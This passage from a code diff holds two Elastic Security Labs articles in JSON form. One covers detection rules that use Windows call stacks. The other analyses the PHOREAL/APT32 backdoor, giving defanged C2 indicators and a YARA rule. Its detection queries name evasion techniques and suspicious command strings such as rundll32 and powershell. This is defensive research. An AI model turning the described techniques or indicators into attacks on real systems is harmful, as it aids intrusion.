while hunting for suspicious process executions started by **WmiPrvSe.exe** via WMI, you find this instance of **notepad.exe**:\n\n\n\nReviewing the standard event log fields, you may expect that it was started using the [Win32_Process](https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/win32-process) class using the **wmic.exe process call create notepad.exe** syntax. However, the event details describe a series of modules and functions: \n\n\n\nThe blue section depicts the standard intermediary **CreateProcess** Windows APIs, while the red section highlights better information in that we can see that the DLL before the first call to **CreateProcessW** is **wbemcons.dll** and when inspecting its properties we can see that it’s related to [WMI Event Consumers](https://learn.microsoft.com/en-us/windows/win32/wmisdk/commandlineeventconsumer). We can conclude that this **notepad.exe** instance is likely related to a WMI Event Subscription. This will require specific incident response steps to mitigate the WMI persistence mechanism.\n\n\n\nAnother great example is Windows scheduled tasks. When executed, they are spawned as children of the Schedule service, which runs within a **svchost.exe** host process. Modern Windows 11 machines may have 50 or more **svchost.exe** processes running. Fortunately, the Schedule service has a specific process argument **-s Schedule** which differentiates it: \n\n\n\nIn older Windows versions, the Scheduled Tasks service is a member of the Network Service group and executed as a component of the **netsvcs** shared **svchost.exe** instance. Not all children of this process are necessarily scheduled tasks in these older versions: \n\n\n\nInspecting the call stack on both versions, we can see the module that is adjacent to the **CreateProcess** call is the same **ubpm.dll** (Unified Background Process Manager DLL) executing the exported function **ubpm.dll!UbpmOpenTriggerConsumer**:\n\n\n\nUsing the following KQL query, we can hunt for task executions on both versions: \n\n```\nevent.action :\"start\" and \nprocess.parent.name :\"svchost.exe\" and process.parent.args : netsvcs and \nprocess.parent.thread.Ext.call_stack_summary : *ubpm.dll* \n```\n\n\n\nAnother interesting example occurs when a user double-clicks a script file from a ZIP archive that was opened using Windows Explorer. Looking at the process tree, you will see that **explorer.exe** is the parent and the child is a script interpreter process like **wscript.exe** or **cmd.exe**. \n\nThis process tree can be confused with a user double-clicking a script file from any location on the file system, which is not very suspicious. But if we inspect the call stack we can see that the parent stack is pointing to **zipfld.dll** (Zipped Folders Shell Extension): \n\n\n\n## Detection Examples \nNow that we have a better idea of how to use the call stack to better interpret events, let’s explore some advanced detection examples per event type.\n\n### Process \n\n#### Suspicious Process Creation via Reflection\n[Dirty Vanity](https://www.deepinstinct.com/blog/dirty-vanity-a-new-approach-to-code-injection-edr-bypass) is a recent code-injection technique that abuses process forking to execute shellcode within a copy of an existing process. When a process is forked, the OS makes a copy of an existing process, including its address space and any [inheritable](https://learn.microsoft.com/en-us/windows/win32/sysinfo/handle-inheritance) handles therein. \n\nWhen executed, Dirty Vanity will fork an instance of a targeted process (already running or a sacrificial one) and then inject into it. Using process creation notification [callbacks](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntddk/nc-ntddk-pcreate_process_notify_routine_ex) won’t log forked processes because the forked process initial thread isn’t executed. But in the case of this injection technique, the forked process will be injected and a thread will be started, which triggers the process start event log with the following call stack: \n\n\n\nWe can see the call to **RtlCreateProcessReflection** and **RtlCloneUserProcess** to fork the process. Now we know that this is a forked process, and the next question is “Is this common in normal conditions?” While diagnostically this behavior appears to be common and alone, it is not a strong signal of something malicious. Checking further to see if the forked processes perform any network connections, loads DLLs, or spawns child processes revealed to be less common and made for good detections: \n\n```\n// EQL detecting a forked process spawning a child process - very suspicious\n\nprocess where event.action == \"start\" and\n\ndescendant of \n [process where event.action == \"start\" and \n _arraysearch(process.parent.thread.Ext.call_stack, $entry, \n $entry.symbol_info: \n (\"*ntdll.dll!RtlCreateProcessReflection*\", \n \"*ntdll.dll!RtlCloneUserProcess*\"))] and\n\nnot (process.executable : \n (\"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFault.exe\", \n \"?:\\\\WINDOWS\\\\system32\\\\WerFault.exe\") and\n process.parent.thread.Ext.call_stack_summary : \n \"*faultrep.dll|wersvc.dl*\")\n```\n\n```\n// EQL detecting a forked process loading a network DLL \n// or performs a network connection - very suspicious\n\nsequence by process.entity_id with maxspan=1m\n [process where event.action == \"start\" and\n _arraysearch(process.parent.thread.Ext.call_stack, \n $entry, $entry.symbol_info: \n (\"*ntdll.dll!RtlCreateProcessReflection*\", \n \"*ntdll.dll!RtlCloneUserProcess*\"))]\n [any where\n (\n event.category : (\"network\", \"dns\") or \n (event.category == \"library\" and \n dll.name : (\"ws2_32.dll\", \"winhttp.dll\", \"wininet.dll\"))\n )]\n```\n\nHere’s an example of forking **explore.exe** and executing shellcode that spawns **cmd.exe** from the forked **explorer.exe** instance:\n\n\n\n\n\n### Direct Syscall via Assembly Bytes\nThe second and final example for process events is process creation via direct syscall. This directly uses the syscall instruction instead of calling the **NtCreateProcess** API. Adversaries may use [this method](https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs) to avoid security products that are reliant on usermode API hooking (which Elastic Defend is not):\n\n```\nprocess where event.action : \"start\" and \n\n// EQL detecting a call stack not ending with ntdll.dll \nnot process.parent.thread.Ext.call_stack_summary : \"ntdll.dll*\" and \n\n/* last call in the call stack contains bytes that execute a syscall\n manually using assembly */\n\n_arraysearch(process.parent.thread.Ext.call_stack, $entry,\n ($entry.callsite_leading_bytes : (\"*4c8bd1b8??????000f05\", \n \"*4989cab8??????000f05\", \"*4c8bd10f05\", \"*4989ca0f05\")))\n```\n \nThis example matches when the final memory region in the call stack is unbacked and contains assembly bytes that end with the syscall instruction (**0F05**):\n\n\n\n## File\n\n### Suspicious Microsoft Office Embedded Object\nThe following rule logic identifies suspicious file extensions written by a Microsoft Office process from an embedded OLE stream, frequently used by malicious documents to drop payloads for initial access.\n\n\n\n```\n// EQL detecting file creation event with call stack indicating \n// OleSaveToStream call to save or load the embedded OLE object\n\nfile where event.action != \"deletion\" and \n\nprocess.name : (\"winword.exe\", \"excel.exe\", \"powerpnt.exe\") and\n\n_arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info:\n (\"*!OleSaveToStream*\", \"*!OleLoad*\")) and\n(\n file.extension : (\"exe\", \"dll\", \"js\", \"vbs\", \"vbe\", \"jse\", \"url\", \n \"chm\", \"bat\", \"mht\", \"hta\", \"htm\", \"search-ms\") or\n\n /* PE & HelpFile */\n file.Ext.header_bytes : (\"4d5a*\", \"49545346*\")\n )\n```\n\nExample of matches : \n\n\n\n### Suspicious File Rename from Unbacked Memory\nCertain ransomware may inject into signed processes before starting their encryption routine. File rename and modification events will appear to originate from a trusted process, potentially bypassing some heuristics that exclude signed processes as presumed false positives. The following KQL query looks for file rename of documents, from a signed binary and with a suspicious call stack: \n\n```\nfile where event.action : \"rename\" and \n \nprocess.code_signature.status : \"trusted\" and file.extension != null and \n\nfile.Ext.original.name : (\"*.jpg\", \"*.bmp\", \"*.png\", \"*.pdf\", \"*.doc\", \n\"*.docx\", \"*.xls\", \"*.xlsx\", \"*.ppt\", \"*.pptx\") and\n\nnot file.extension : (\"tmp\", \"~tmp\", \"diff\", \"gz\", \"download\", \"bak\", \n\"bck\", \"lnk\", \"part\", \"save\", \"url\", \"jpg\", \"bmp\", \"png\", \"pdf\", \"doc\", \n\"docx\", \"xls\", \"xlsx\", \"ppt\", \"pptx\") and \n\nprocess.thread.Ext.call_stack_summary :\n(\"ntdll.dll|kernelbase.dll|Unbacked\",\n \"ntdll.dll|kernelbase.dll|kernel32.dll|Unbacked\", \n \"ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|kernelbase.dll|Unknown|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|kernelbase.dll|kernel32.dll|Unknown|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|kernelbase.dll|kernel32.dll|mscorlib.ni.dll|Unbacked\", \n \"ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|kernelbase.dll|\n Unbacked\", \"ntdll.dll|wow64.dll|wow64cpu.dll|wow64.dll|ntdll.dll|\n kernelbase.dll|Unbacked|kernel32.dll|ntdll.dll\", \n \"ntdll.dll|Unbacked\", \"Unbacked\", \"Unknown\")\n ```\n \n Here are some examples of matches where **explorer.exe** (Windows Explorer) is injected by the [KNIGHT/CYCLOPS](https://www.bleepingcomputer.com/news/security/knight-ransomware-distributed-in-fake-tripadvisor-complaint-emails/) ransomware: \n \n \n\n### Executable File Dropped by an Unsigned Service DLL\nCertain types of malware maintain their presence by disguising themselves as Windows service DLLs. To be recognized and managed by the Service Control Manager, a service DLL must export a function named **ServiceMain**. The KQL query below helps identify instances where an executable file is created, and the call stack includes the **ServiceMain** function.\n\n```\nevent.category : file and \n file.Ext.header_bytes :4d5a* and process.name : svchost.exe and \n process.thread.Ext.call_stack.symbol_info :*!ServiceMain*\n```\n\n\n\n## Library\n\n### Unsigned Print Monitor Driver Loaded\nThe following EQL query identifies the loading of an unsigned library by the print spooler service where the call stack indicates the load is coming from **SplAddMonitor**. Adversaries may use [port monitors](https://attack.mitre.org/techniques/T1547/010/) to run an adversary-supplied DLL during system boot for persistence or privilege escalation.\n\n```\nlibrary where\nprocess.executable : (\"?:\\\\Windows\\\\System32\\\\spoolsv.exe\", \n\"?:\\\\Windows\\\\SysWOW64\\\\spoolsv.exe\") and not dll.code_signature.status : \n\"trusted\" and _arraysearch(process.thread.Ext.call_stack, $entry, \n$entry.symbol_info: \"*localspl.dll!SplAddMonitor*\")\n```\n\nExample of match: \n\n\n\n### Potential Library Load via ROP Gadgets\nThis EQL rule identifies the loading of a library from unusual **win32u** or **ntdll** offsets. This may indicate an attempt to bypass API monitoring using Return Oriented Programming (ROP) assembly gadgets to execute a syscall instruction from a trusted module.\n\n```\nlibrary where\n// adversaries try to use ROP gadgets from ntdll.dll or win32u.dll \n// to construct a normal-looking call stack\n\nprocess.thread.Ext.call_stack_summary : (\"ntdll.dll|*\", \"win32u.dll|*\") and \n\n// excluding normal Library Load APIs - LdrLoadDll and NtMapViewOfSection\nnot _arraysearch(process.thread.Ext.call_stack, $entry, \n $entry.symbol_info: (\"*ntdll.dll!Ldr*\", \n \"*KernelBase.dll!LoadLibrary*\", \"*ntdll.dll!*MapViewOfSection*\"))\n```\n\nThis example matches when [AtomLdr](https://www.kitploit.com/2023/06/atomldr-dll-loader-with-advanced.html) loads a DLL using ROP gadgets from **win32u.dll** instead of using **ntdll**’s load library APIs (**LdrLoadDll** and **NtMapViewOfSection**).\n\n\n\n### Evasion via LdrpKernel32 Overwrite\nThe [LdrpKernel32(https://github.com/rbmm/LdrpKernel32DllName) evasion is an interesting technique to hijack the early execution of a process during the bootstrap phase by overwriting the bootstrap DLL name referenced in **ntdll.dll** memory– forcing the process to load a malicious DLL. \n\n```\nlibrary where \n \n// BaseThreadInitThunk must be exported by the rogue bootstrap DLL\n _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info :\n \"*!BaseThreadInitThunk*\") and\n\n// excluding kernel32 that exports normally exports BasethreadInitThunk\nnot _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info\n (\"?:\\\\Windows\\\\System32\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\SysWOW64\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\WinSxS\\\\*\\\\kernel32.dll!BaseThreadInitThunk*\", \n \"?:\\\\Windows\\\\WinSxS\\\\Temp\\\\PendingDeletes\\\\*!BaseThreadInitThunk*\", \n \"\\\\Device\\\\*\\\\Windows\\\\*\\\\kernel32.dll!BaseThreadInitThunk*\"))\n```\n\nExample of match: \n\n\n## Suspicious Remote Registry Modification\nSimilar to the scheduled task example, the remote registry service is hosted in **svchost.exe**. We can use the call stack to detect registry modification by monitoring when the Remote Registry service points to an executable or script file. This may indicate an attempt to move laterally via remote configuration changes.\n\n```\nregistry where \n\nevent.action == \"modification\" and \n\nuser.id : (\"S-1-5-21*\", \"S-1-12-*\") and \n\n process.name : \"svchost.exe\" and \n\n// The regsvc.dll in call stack indicate that this is indeed the \n// svchost.exe instance hosting the Remote registry service\n\nprocess.thread.Ext.call_stack_summary : \"*regsvc.dll|rpcrt4.dll*\" and\n\n (\n // suspicious registry values\n registry.data.strings : (\"*:\\\\*\\\\*\", \"*.exe*\", \"*.dll*\", \"*rundll32*\", \n \"*powershell*\", \"*http*\", \"* /c *\", \"*COMSPEC*\", \"\\\\\\\\*.*\") or\n \n // suspicious keys like Services, Run key and COM\n registry.path :\n (\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\InprocServer32\\\\\",\n \"HKEY_USERS\\\\*Classes\\\\*\\\\LocalServer32\\\\\",\n \"H*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\") or\n \n // potential attempt to remotely disable a service \n (registry.value : \"Start\" and registry.data.strings : \"4\")\n )\n```\n\nThis example matches when the Run key registry value is modified remotely via the Remote Registry service: \n\n\n\n## Conclusion\nAs we’ve demonstrated, call stacks are not only useful for finding known bad patterns, but also for reducing ambiguity in standard EDR events, and easing behavior interpretation. The examples we've provided here represent just a minor portion of the potential detection possibilities achievable by applying enhanced enrichment to the same dataset.\n"
+ },
+ "title": "Peeling back the curtain with call stacks",
+ "slug": "peeling-back-the-curtain-with-call-stacks",
+ "date": "2023-09-13",
+ "description": "In this article, we'll show you how we contextualize rules and events, and how you can leverage call stacks to better understand any alerts you encounter in your environment.",
+ "author": [
+ {
+ "slug": "samir-bousseaden"
+ }
+ ],
+ "image": "photo-edited-10@2x.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "security-research"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "detection engineering",
+ "threat hunting",
+ "threat detection"
+ ]
+ },
+ "id": "security_labs_content-peeling_back_the_curtain_with_call_stacks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json
new file mode 100644
index 00000000000..c82f38a8c08
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-phoreal_malware_targets_the_southeast_asian_financial_sector-md.json
@@ -0,0 +1,45 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"PHOREAL Malware Targets the Southeast Asian Financial Sector\"\nslug: \"phoreal-malware-targets-the-southeast-asian-financial-sector\"\ndate: \"2023-03-02\"\ndescription: \"Elastic Security discovered PHOREAL malware, which is targeting Southeast Asia financial organizations, particularly those in the Vietnamese financial sector.\"\nauthor:\n - slug: daniel-stepanic\n - slug: derek-ditch\n - slug: joe-desimone\n - slug: remco-sprooten\n - slug: andrew-pease\n - slug: cyril-francois\nimage: \"blog-thumb-roman-columns.jpg\"\ncategory:\n - slug: campaigns\ntags:\n - phoreal\n - rizzo\n - malware\n - backdoor\n---\n\n## Preamble\n\nElastic Security has identified an ongoing campaign targeting a Vietnamese financial services institution with the PHOREAL/RIZZO backdoor. While this malware has been in use for some time, this is the first time that we have observed it loading into memory as a defense evasion and campaign protection technique. Upon analysis of our own observations and previously reported information, we are tracking this activity group (malware + technique + victimology) as REF4322.\n\n### What is the threat?\n\nPHOREAL/RIZZO is a backdoor allowing initial victim characterization and follow-on post-exploitation operations to compromise the confidentiality of organizations’ data. It has been reported in other research as being used exclusively by APT32 (AKA SeaLotus, OceanLotus, APT-C-00, Group G0050).\n\n### What is the impact?\n\nAPT32 largely targets victims with political or economic interests in Southeast Asia, specifically Vietnam.\n\n### What is Elastic doing about it?\n\nElastic Security detailed how to triage one of these threat alerts, extracted observables for endpoint and network filtering, and produced a new malware signature for identification and mitigation of the threat across the fleet of deployed Elastic Agents.\n\n## Investigation Details\n\nWhile conducting Threat Discovery & Monitoring operations, Elastic Security researchers identified a cluster of shellcode_thread Windows memory protection alerts generated from an Elastic Agent endpoint sensor. These particular alerts were interesting because they all occurred within the same cluster, and unusually they targeted the control.exe process. The Windows control.exe process handles the execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.\n\nGenerally when we observe false positives for the shellcode_thread protection, it is identified across a broad user-base and in many cases it is attributed to various gaming anti-cheat or DRM (Digital Rights Management) mechanisms. In this case, a single cluster and a Microsoft signed target process was atypical, and worthy of further investigation.\n\n> You can read more about Elastic Security’s memory protections [HERE](https://www.elastic.co/blog/whats-new-elastic-security-7-15-0#:~:text=Memory%20threat%20protection%20for%20Windows%20endpoints) and about in-memory attacks [HERE](https://www.elastic.co/blog/hunting-memory).\n\nWith our interest piqued from the outlier characteristics of the alerts, we investigated further to validate and characterize the threat:\n\n**Targeted process is a signed Windows binary**\n\n```\n...\n\"process\": {\n \"args\": [\n \"control.exe\",\n \"Firewall.cpl\",\n \"{2D48D219-C306-4349-AE1F-09744DFFB5B9}\"\n ],\n \"Ext\": {\n \"code_signature\": [\n {\n \"trusted\": true,\n \"subject_name\": \"Microsoft Windows\",\n \"exists\": true,\n \"status\": \"trusted\"\n }\n ],\n \"dll\": [\n...\n\n```\n\n**Unsigned loaded .dll**\n\n```\n...\n \"Ext\": {\n \"mapped_address\": 1945501696,\n \"mapped_size\": 21135360\n },\n \"path\": \"C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll\",\n \"code_signature\": [\n {\n \"exists\": false\n }\n ],\n \"name\": \"tscon32.dll\",\n \"hash\": {\n \"sha1\": \"007970b7a42852b55379ef4cffa4475865c69d48\",\n \"sha256\": \"ec5d5e18804e5d8118c459f5b6f3ca96047d629a50d1a0571dee0ac8d5a4ce33\",\n \"md5\": \"2b6da20e4fc1af2c5dd5c6f6191936d1\"\n }\n },\n...\n\n```\n\n**Starting module from the alerting thread**\n\n```\n...\n \"pe\": {\n \"original_file_name\": \"CONTROL.EXE\"\n },\n \"name\": \"control.exe\",\n \"pid\": 5284,\n \"thread\": {\n \"Ext\": {\n \"start_address_module\": \"C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll\",\n...\n\n```\n\n**Alerting memory region metadata**\n\n```\n...\n\"memory_region\": {`\n \"region_size\": 73728,\n \"region_protection\": \"RWX\",\n \"allocation_base\": 81395712,\n \"bytes_allocation_offset\": 0,\n \"allocation_type\": \"PRIVATE\",\n \"memory_pe_detected\": true,\n \"region_state\": \"COMMIT\",\n \"strings\": [\n \"QSSSSSSh \",\n ...\n \"bad cast\",\n \"Local\\\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\",\n \"Netapi32.dll\",\n \"NetWkstaGetInfo\",\n \"NetApiBufferFree\",\n \"\\\\\\\\.\\\\pipe\\\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\",\n \"list too long\",\n \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\",\n \"DllEntry\",\n ...\n \".?AVbad_alloc@std@@\",\n \"C:\\\\Windows\\\\syswow64\\\\control.exe\",\n \":z:zzzzzz7\",\n ...\n \"InternalName\",\n \"mobsync.exe\",\n \"LegalCopyright\",\n...\n\n```\n\n**Thread data for pivoting**\n\n```\n...\n\"thread\": {\n \"Ext\": {\n \"start_address_bytes\": \"8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300\",\n ...\n \"start_address_bytes_disasm\": \"mov edi, edi\\npush ebp\\nmov ebp, esp\\ncall 0x000043f0\\ncall 0x000043ea\\npush eax\\ncall 0x000043d0\\ntest eax, eax\\njnz 0x00000038\\npush dword ptr [ebp+0x08]\"\n },\n...\n\n```\n\nFrom the example alert we first identify the start_address_module which is the dll/module where the thread began. C:\\\\Windows\\\\SysWOW64\\\\tscon32.dll is the start_address_module for the thread that we’ve alerted on. It’s also the only unsigned dll loaded, so a great place to focus our efforts. When checking the hash value in VirusTotal, to identify previously disclosed information about the sample, we did not see any results.\n\nDigging deeper, we looked at the start_address_bytes, which are the first 32 bytes of our alerting thread. We can use the value of the start_address_bytes (8bff558bece8e6430000e8db43000050e8bb43000085c0751fff7508e8c94300) to search for pivots in VirusTotal by querying content: \\{8bff558bec56e83f3e0000e8343e000050e8143e000085c0752a8b750856e821\\}. We identified relatively few results, but they included [the below entry](https://www.virustotal.com/gui/file/88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de) first submitted in July 2021.\n\n\n\nIn researching the results from VirusTotal, we could see that threat researcher Felix Bilstein ([@fxb_b](https://twitter.com/fxb_b)) authored a crowdsourced YARA rule identifying this as the [PHOREAL](https://attack.mitre.org/software/S0158/) backdoor. Moving on to the CONTENT tab, we can compare some of the strings from our alert with what has been previously reported to VirusTotal.\n\n\n\nUsing the unique strings we identified above and the start_address_bytes, we can create a YARA signature by converting the unique strings ($a) and the start\\_address\\_bytes ($b) into hex values as shown below.\n\n**Converted YARA strings**\n\n```\nstrings:\n \\\\ \"\\\\.\\pipe\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\" ascii wide\n $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00\n 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00\n 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00\n 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00\n 45 00 35 00 7D 00 }\n\n \\\\ \"Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\" ascii wide\n $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00\n 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00\n 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00\n 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }\n\n \\\\ \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\" ascii\n $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39\n 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }\n\n \\\\ PHOREAL start_address_bytes sequence\n \\\\ mov edi, edi; push ebp; mov ebp, esp; call 0x000043f0;\n \\\\ call 0x000043ea; push eax; call 0x000043d0; test eax, eax;\n \\\\ jnz 0x00000038; push dword ptr [ebp+0x08]\n $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E\n 00 00 85 C0 75 2A 8B 75 08 56 E8 21 }\ncondition:\n 2 of them\n\n```\n\nThis rule when deployed to the Elastic Agent will identify PHOREAL to customers and backstop prevention already provided through the shellcode_thread memory protection (in customer environments with memory protection turned on). In our case this rule’s deployment also enabled the collection of the malicious thread using the same mechanism detailed in our [Collecting Cobalt Strike Beacons](https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack) article.\n\nShortly after the new YARA artifact was deployed we had a new malware_signature alert in hand with the malicious thread captured from memory. Manual binary triage from our Malware Analysis and Reverse Engineering (MARE) Team quickly confirmed the sample was PHOREAL/RIZZO by comparing the structure and functions between our sample and past reporting. Further, they were able to extract an RC4 encrypted domain from an [RCDATA resource](https://docs.microsoft.com/en-us/windows/win32/menurc/rcdata-resource) as described in a [2018 CYLANCE OceanLotus whitepaper](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf).\n\n\n\nThe domain identified by MARE (thelivemusicgroup[.]com) currently resolves to 103.75.117[.]250 which is owned by Oneprovider[.]com, a dedicated server hosting company based out of Canada with data centers distributed globally.\n\n**https://ipinfo.io/ query results for 103.75.117[.]250**\n\n```\n{\n \"ip\": \"103.75.117[.]250\",\n \"city\": \"Hong Kong\",\n \"region\": \"Central and Western\",\n \"country\": \"HK\",\n \"loc\": \"22.2783,114.1747\",\n \"org\": \"AS133752 Leaseweb Asia Pacific pte. ltd.\",\n \"timezone\": \"Asia/Hong_Kong\",\n \"asn\": {\n \"asn\": \"AS133752\",\n \"name\": \"Leaseweb Asia Pacific pte. ltd.\",\n \"domain\": \"leaseweb.com\",\n \"route\": \"103.75.117[.]0/24\",\n \"type\": \"hosting\"\n },\n \"company\": {\n \"name\": \"Oneprovider.com - Hong Kong Infrastructure\",\n \"domain\": \"oneprovider[.]com\",\n \"type\": \"hosting\"\n },\n \"privacy\": {\n \"vpn\": false,\n \"proxy\": false,\n \"tor\": false,\n \"relay\": false,\n \"hosting\": true,\n \"service\": \"\"\n },\n \"abuse\": {\n \"address\": \"1500 Ste-Rose LAVAL H7R 1S4 Laval Quebec, Canada\",\n \"country\": \"CA\",\n \"email\": \"info@oneprovider.com\",\n \"name\": \"ONE PROVIDER\",\n \"network\": \"103.75.117[.]0/24\",\n \"phone\": \"+1 514 286-0253\"\n },\n \"domains\": {\n \"ip\": \"103.75.117[.]250\",\n \"total\": 2,\n \"domains\": [\n \"thelivemusicgroup[.]com\",\n \"cdn-api-cn-1[.]com\"\n ]\n }\n\n```\n\nMost of the interesting information about the domain is privacy guarded, but the “Updated” and “Created” dates in the below figure might be useful for bounding how long this domain has been used maliciously.\n\n![https://lookup.icann.org/lookup for thelivemusicgroup[.]com](/assets/images/phoreal-malware-targets-the-southeast-asian-financial-sector/https-lookup.jpg)\n\nThe Elastic Agent appears to have been deployed post-compromise which limited our ability to determine the vector of initial access. A [2017 Mandiant report](https://www.mandiant.com/resources/cyber-espionage-apt32) indicates that PHOREAL may be deployed in an “establish foothold” capacity to allow for victim triage and follow-on post-exploitation tools.\n\n## Analysis\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries and victims of intrusions.\n\n\n\n### Adversary Assessment Justification\n\nWe assess with high confidence based on observed activity and previous reporting that REF4322 is [APT32/OceanLotus](https://attack.mitre.org/groups/G0050/) and the actor behind this incident. APT32 has been active since 2014 [notably targeting](https://www.mandiant.com/resources/cyber-espionage-apt32) Southeast Asian governments and businesses or other international businesses with interests in Vietnam. APT32 is the only group currently identified as operating the PHOREAL backdoor, and our victim matches the geographic and industry vertical profile of typical and specific prior APT32 victims.\n\n## Conclusion\n\n### YARA Rules\n\nWe have created a YARA rule to identify this PHOREAL activity.\n\n**Yara rule to detect REF4322/APT32 in-memory backdoor PHOREAL/Rizzo**\n\n```\nrule Windows_Trojan_PHOREAL {\n meta:\n Author = \"Elastic Security\"\n creation_date = \"2022-02-16\"\n last_modified = \"2022-02-16\"\n os = \"Windows\"\n arch = \"x86\"\n category_type = \"Trojan\"\n family = \"PHOREAL\"\n threat_name = \"Windows.Trojan.PHOREAL\"\n description = \"Detects REF4322/APT32 in-memory backdoor PHOREAL/Rizzo.\"\n reference_sample = \"88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de\"\n\n\n strings:\n \\\\ \"\\\\.\\pipe\\{A06F176F-79F1-473E-AF44-9763E3CB34E5}\" ascii wide\n $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00\n 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00\n 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00\n 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00\n 45 00 35 00 7D 00 }\n\n \\\\ \"Local\\{5FBC3F53-A76D-4248-969A-31740CBC8AD6}\" ascii wide\n $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00\n 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00\n 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00\n 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 }\n\n \\\\ \"{FD5F8447-657A-45C1-894B-D533926C9B66}.dll\" ascii\n $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39\n 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C }\n\n \\\\ PHOREAL start_address_bytes sequence\n $str_addr = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E\n 00 00 85 C0 75 2A 8B 75 08 56 E8 21 }\n condition:\n 2 of them\n}\n\n```\n\n### Defensive Recommendations\n\nThe following steps can be leveraged to improve a network’s protective posture:\n\n1. Enable Elastic Security Memory Protection on Windows endpoints\n2. Leverage the included YARA signatures above to determine if PHOREAL activity exists within your organization\n3. Monitor or block network traffic to or from identified network IOCs and remediate impacted systems accordingly.\n\n### References\n\nThe following research was referenced throughout the document:\n\n- [https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf](https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2018/2018.10.17.OceanLotus_SpyRATs/SpyRATsofOceanLotusMalwareWhitePaper.pdf)\n- [https://www.mandiant.com/resources/cyber-espionage-apt32](https://www.mandiant.com/resources/cyber-espionage-apt32)\n- [https://www.secureworks.com/research/threat-profiles/tin-woodlawn](https://www.secureworks.com/research/threat-profiles/tin-woodlawn)\n- [https://attack.mitre.org/software/S0158/](https://attack.mitre.org/software/S0158/)\n- 